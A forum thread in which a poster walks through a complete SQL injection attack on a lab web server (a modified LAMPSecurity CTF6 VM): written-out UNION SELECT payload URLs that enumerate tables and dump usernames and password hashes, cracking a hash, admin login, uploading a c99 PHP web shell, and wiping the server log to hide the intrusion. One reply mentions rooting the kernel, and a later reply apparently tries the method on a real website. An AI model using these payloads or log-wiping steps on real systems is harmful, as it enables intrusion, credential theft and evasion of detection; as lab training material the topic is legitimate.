Post Reply 
 
Thread Rating:
  • 2 Votes - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Advanced SQL Injection Tutorial - Complete website rooting
12-19-2010, 01:38 PM (This post was last modified: 02-10-2011 03:07 PM by Abhi_M.)
Post: #1
Lightbulb Advanced SQL Injection Tutorial - Complete website rooting
Hi All,

In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.

What all you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell"

Now the process


Step 1:

I'm on the home page of the website now

Code:
http://192.168.132.128/

[Image: mantrahackbar1.jpg]



Step 2:

I went through all the pages of web site and found a page with URL input

Code:
http://192.168.132.128/?id=13

[Image: mantrahackbar2.jpg]



Step 3:

I launched Hackbar by pressing F9

[Image: mantrahackbar3.jpg]



Step 4:

The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.

Code:
http://192.168.132.128/?id=13'

[Image: mantrahackbar4.jpg]


Since the page content is different from the previous one. I can make sure that the web page is vulnerable.


Step 5:

Lets find out the number of tables

Code:
http://192.168.132.128/?id=13 order by 1

[Image: mantrahackbar6.jpg]



Step 6:

I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage

Code:
http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar7.jpg]




Step 7:

I went up to 7 and no change till now

Code:
http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar12.jpg]




Step 8:

I'm on 8 now and I can see the page changed

Code:
http://192.168.132.128/?id=13 order by 8

[Image: mantrahackbar13.jpg]




Step 9:

Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT

[Image: mantrahackbar14.jpg]




Step 10:

I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables

[Image: mantrahackbar16.jpg]




Step 11:

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7


[Image: mantrahackbar19.jpg]




Step 12:

I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

[Image: mantrahackbar21.jpg]


The current user is cms_user@localhost



Step 13:

Lets find out the version of the database. I replaced 2 in the URL with version() command

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

[Image: mantrahackbar22.jpg]


5.0.45 is the version



Step 14:

Let me list all the tables

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

[Image: mantrahackbar23.jpg]


From this list I found "user" is an interesting table



Step 15:

Now I listed all the columns and its a big list

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

[Image: mantrahackbar24.jpg]




Step 16:

I want columns from the table "user" and nothing else

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

[Image: mantrahackbar25.jpg]




Step 17:

Lets find the user name

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

[Image: mantrahackbar27.jpg]




Step 18:

Now, what about password

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

[Image: mantrahackbar26.jpg]


Its encrypted



Step 19:

Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com

[Image: mantrahackbar30.jpg]




Step 20:

Voila.!!! I got the password

[Image: mantrahackbar31.jpg]




Step 21:

Finding the log in page. Its was right in front of me
[Image: mantrahackbar32.jpg]




Step 22:

Logging in with the credentials I have
[Image: mantrahackbar33.jpg]




Step 23:

Greetings.!!!

[Image: mantrahackbar35.jpg]




Step 24:

I'm an admin now. Look at my powers.

[Image: mantrahackbar36.jpg]




Step 25:

Let me add an event

[Image: mantrahackbar37.jpg]




Step 26:

and of course I want to upload a picture

[Image: mantrahackbar38.jpg]




Step 27:

Lets see it allows me to upload the shell or not

[Image: mantrahackbar39.jpg]




Step 28:

Now I'm pressing on "Add Event" button

[Image: mantrahackbar40.jpg]




Step 29:

Nice. Looks like it's got uploaded

[Image: mantrahackbar41.jpg]




Step 30:

Let's see where the shell got uploaded to

[Image: mantrahackbar42.jpg]




Step 31:

I'm trying to get the default upload location

[Image: mantrahackbar43.jpg]


[Image: mantrahackbar44.jpg]




Step 32:

Looks like I got it

[Image: mantrahackbar45.jpg]


Let me click on the c9shell.php file I just uploaded



Step 33:

Voila. I have shell access

[Image: mantrahackbar46.jpg]




Step 34:

I simply clicked on the up button to get the root folder

[Image: mantrahackbar48.jpg]


Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial



Step 35:

What I'm interested is the log folder

[Image: mantrahackbar49.jpg]





Step 36:

I clicked on the log.log file and it has the logs of my noisy SQL injection attacks

[Image: mantrahackbar51.jpg]




Step 37:

Let me go back and edit the log file

[Image: mantrahackbar52.jpg]


[Image: mantrahackbar53.jpg]




Step 38:

I deleted complete log entries. Now saving it.

[Image: mantrahackbar54.jpg]




Step 39:

Nice. Log file is empty now

[Image: mantrahackbar56.jpg]




Step 40:

Now. Lets remove the c99 shell by pressing on Self Remove

[Image: mantrahackbar57.jpg]




Step 41:

Confirmed.!!!

[Image: mantrahackbar58.jpg]




Step 42:

OK. Good Bye C99

[Image: mantrahackbar59.jpg]




Step 43:

Well. It got deleted itself

[Image: mantrahackbar60.jpg]


Reference:

1. Infond tutorial

Happy Hacking.!!!

Use Mantra forums.
Please do not PM/E-mail me regarding any technical queries straight away.
Find all posts by this user
Quote this message in a reply
01-29-2011, 05:10 AM
Post: #2
RE: Advanced SQL Injection Tutorial - Complete website rooting
Cool !!
Find all posts by this user
Quote this message in a reply
08-24-2011, 12:17 PM
Post: #3
RE: Advanced SQL Injection Tutorial - Complete website rooting
nice tutorial
Find all posts by this user
Quote this message in a reply
02-18-2013, 07:32 AM
Post: #4
RE: Advanced SQL Injection Tutorial - Complete website rooting
Nice tutorial mate... But where is Rooting section? We can easily root that Centos server it has a 2.6.18-164 kernel...
Find all posts by this user
Quote this message in a reply
04-03-2013, 01:49 AM
Post: #5
RE: Advanced SQL Injection Tutorial - Complete website rooting
(02-18-2013 07:32 AM)Un0wn_X Wrote:  Nice tutorial mate... But where is Rooting section? We can easily root that Centos server it has a 2.6.18-164 kernel...

You got me there, I never finished the tutorial.
Then later on thought its just a matter of few searches on the Internet on how to do that and does not necessarily need Mantra. But that's not an excuse when the title says "rooting".

Will look into updating the post. Or better, you can write a short tutorial for all of us.

Use Mantra forums.
Please do not PM/E-mail me regarding any technical queries straight away.
Find all posts by this user
Quote this message in a reply
05-10-2013, 03:42 PM
Post: #6
RE: Advanced SQL Injection Tutorial - Complete website rooting
hi sir good day
what kind of toolbar is this?
[Image: 17687013875a576a98d21b94767d8f1b9193bc72.png]


it makes order by 1, order by 2 easy to type
Find all posts by this user
Quote this message in a reply
05-17-2013, 01:51 PM
Post: #7
RE: Advanced SQL Injection Tutorial - Complete website rooting
(05-10-2013 03:42 PM)asapol Wrote:  hi sir good day
what kind of toolbar is this?
[Image: 17687013875a576a98d21b94767d8f1b9193bc72.png]


it makes order by 1, order by 2 easy to type

It's one of my favorite extension, Hackbar -
http://secpedia.net/wiki/Hackbar
https://addons.mozilla.org/en-US/firefox/addon/hackbar/

Use Mantra forums.
Please do not PM/E-mail me regarding any technical queries straight away.
Find all posts by this user
Quote this message in a reply
08-26-2013, 12:45 AM (This post was last modified: 09-06-2013 04:57 AM by mantra.)
Post: #8
RE: Advanced SQL Injection Tutorial - Complete website rooting
please help me
me use order by .. in websire error - Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/content/27/9872627/html/includes/header.html on line 61

-me keep on increasing the last number i no see any changes in the pageHuh
why ?Huh
sory my english not goodBlush
http://www.<removed_website_name>....p?pid=219'
Find all posts by this user
Quote this message in a reply
Post Reply 


Possibly Related Threads...
Thread: Author Replies: Views: Last Post
Video OWASP Bricks - Advanced SQL injection Content page #3 with Mantra Abhi_M 4 4,165 10-31-2013 04:05 AM
Last Post: Boewk36
Photo Advanced SQL Injection on user agent - OWASP Bricks content page #4 Abhi_M 0 4,407 09-07-2013 02:55 AM
Last Post: Abhi_M
Photo OWASP Bricks Login page #4 SQL Injection Abhi_M 0 4,946 09-07-2013 02:53 AM
Last Post: Abhi_M
Video OWASP Bricks - SQL injection on log in page #3 with Mantra Abhi_M 0 2,777 07-13-2013 12:02 PM
Last Post: Abhi_M
Video Advanced SQL Injection - String with OWASP Bricks and Mantra Abhi_M 0 2,535 06-08-2013 03:02 AM
Last Post: Abhi_M